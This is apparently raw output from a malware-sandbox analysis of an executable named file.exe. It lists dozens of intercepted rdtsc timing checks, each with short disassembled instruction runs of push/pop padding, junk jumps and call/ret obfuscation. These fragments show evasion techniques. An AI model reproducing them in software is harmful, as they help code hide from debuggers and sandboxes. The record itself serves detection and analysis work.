Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B57FAC second address: B57FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B580F8 second address: B580FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B580FE second address: B5810A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5810A second address: B58114 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58114 second address: B58118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58282 second address: B58294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FC3A8C83B36h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58294 second address: B582A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C8176Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5864C second address: B58650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B586CD second address: B586D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B586D3 second address: B586D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58AAF second address: B58AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58AB7 second address: B58ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58B3A second address: B58B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 xchg eax, ebx 0x00000006 push 00000000h 0x00000008 push esi 0x00000009 call 00007FC3A8C81768h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], esi 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc esi 0x0000001c push esi 0x0000001d ret 0x0000001e pop esi 0x0000001f ret 0x00000020 mov di, A323h 0x00000024 pushad 0x00000025 pushad 0x00000026 jmp 00007FC3A8C81771h 0x0000002b mov esi, eax 0x0000002d popad 0x0000002e mov ebx, 6F9ABD90h 0x00000033 popad 0x00000034 jp 00007FC3A8C81768h 0x0000003a mov esi, edx 0x0000003c nop 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 jc 00007FC3A8C81766h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58B95 second address: B58BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC3A8C83B3Bh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58BC1 second address: B58BC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B58E7C second address: B58EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B3Dh 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC3A8C83B48h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B590F4 second address: B590F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B590F9 second address: B590FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B590FF second address: B59110 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B59156 second address: B59192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c je 00007FC3A8C83B36h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop ecx 0x00000016 nop 0x00000017 pushad 0x00000018 mov edi, 66482B80h 0x0000001d sbb dx, 40C1h 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push edx 0x00000027 jmp 00007FC3A8C83B3Ch 0x0000002c pop edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B59192 second address: B5919C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FC3A8C81766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5A031 second address: B5A053 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC3A8C83B38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d jmp 00007FC3A8C83B3Ah 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FC3A8C83B36h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5BCEC second address: B5BCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5BCF0 second address: B5BCF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5BCF4 second address: B5BCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5BCFA second address: B5BCFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5BCFF second address: B5BD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5D6D2 second address: B5D6E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FC3A8C83B36h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5D6E8 second address: B5D6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5D6EC second address: B5D70A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007FC3A8C83B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jo 00007FC3A8C83B36h 0x00000013 jmp 00007FC3A8C83B3Ah 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5D70A second address: B5D72B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C81777h 0x00000009 jbe 00007FC3A8C81766h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5D72B second address: B5D731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5DCE9 second address: B5DCEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F49E second address: B5F4A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FE2B second address: B5FE45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C81776h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61C13 second address: B61C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61C17 second address: B61C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61DDC second address: B61DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61DE0 second address: B61DE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B63C8B second address: B63C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B63C97 second address: B63C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B63C9B second address: B63D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FC3A8C83B38h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FC3A8C83B38h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 movsx ebx, ax 0x0000002b push 00000000h 0x0000002d jmp 00007FC3A8C83B45h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FC3A8C83B38h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov ebx, dword ptr [ebp+122D3994h] 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FC3A8C83B45h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B63D2A second address: B63D43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81775h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B63D43 second address: B63D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B65D15 second address: B65D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B65D19 second address: B65D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jc 00007FC3A8C83B36h 0x00000011 jmp 00007FC3A8C83B47h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B64E44 second address: B64E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66DCB second address: B66DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66DCF second address: B66DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC3A8C8176Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66DE5 second address: B66DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66F8B second address: B66F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D65 second address: B68D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3A8C83B3Ch 0x00000008 jns 00007FC3A8C83B36h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D82 second address: B68D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007FC3A8C8176Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68D8F second address: B68DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push esi 0x00000009 call 00007FC3A8C83B38h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], esi 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc esi 0x0000001c push esi 0x0000001d ret 0x0000001e pop esi 0x0000001f ret 0x00000020 mov edi, dword ptr [ebp+122D203Fh] 0x00000026 jmp 00007FC3A8C83B3Ah 0x0000002b sub bx, 9A69h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 mov bl, ah 0x00000036 push eax 0x00000037 push ecx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69D10 second address: B69DA8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FC3A8C81768h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FC3A8C81768h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FC3A8C81768h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push ecx 0x0000004f call 00007FC3A8C81768h 0x00000054 pop ecx 0x00000055 mov dword ptr [esp+04h], ecx 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc ecx 0x00000062 push ecx 0x00000063 ret 0x00000064 pop ecx 0x00000065 ret 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FC3A8C81779h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69DA8 second address: B69DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C83B3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6AE82 second address: B6AE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6AE86 second address: B6AE8C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69F55 second address: B69F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69F5C second address: B69F62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69F62 second address: B69F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6BF14 second address: B6BF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6BF1A second address: B6BF30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C81772h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6D032 second address: B6D036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6D036 second address: B6D041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC3A8C81766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6C1D6 second address: B6C1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6E0C4 second address: B6E0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6E0D1 second address: B6E0D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6D2A2 second address: B6D2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6D2A6 second address: B6D2AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6D2AC second address: B6D2B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6D2B1 second address: B6D2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC3A8C83B36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jnl 00007FC3A8C83B3Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6E210 second address: B6E215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FF7A second address: B6FF80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FF80 second address: B6FF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC3A8C81766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FF8A second address: B7001D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FC3A8C83B38h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 call 00007FC3A8C83B42h 0x0000002a sub ebx, 4B7E7097h 0x00000030 pop edi 0x00000031 push 00000000h 0x00000033 mov ebx, dword ptr [ebp+122D3900h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007FC3A8C83B38h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 and edi, 27CCDE2Bh 0x0000005b xor dword ptr [ebp+122D2034h], ecx 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 pushad 0x00000064 jmp 00007FC3A8C83B40h 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7001D second address: B7003E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FC3A8C81776h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70F04 second address: B70F25 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC3A8C83B47h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70F25 second address: B70F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC3A8C8176Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70FDC second address: B70FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B760A1 second address: B760AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B157A1 second address: B157AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC3A8C83B36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71101 second address: B71106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71106 second address: B7110C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7110C second address: B71110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71110 second address: B71114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B10779 second address: B1077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1077F second address: B107AF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC3A8C83B3Ch 0x00000008 push ecx 0x00000009 jmp 00007FC3A8C83B45h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jng 00007FC3A8C83B3Eh 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7AEC4 second address: B7AEFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81774h 0x00000007 jnc 00007FC3A8C81766h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FC3A8C81775h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7AEFB second address: B7AF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7AF13 second address: B7AF17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7AF17 second address: B7AF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC3A8C83B44h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
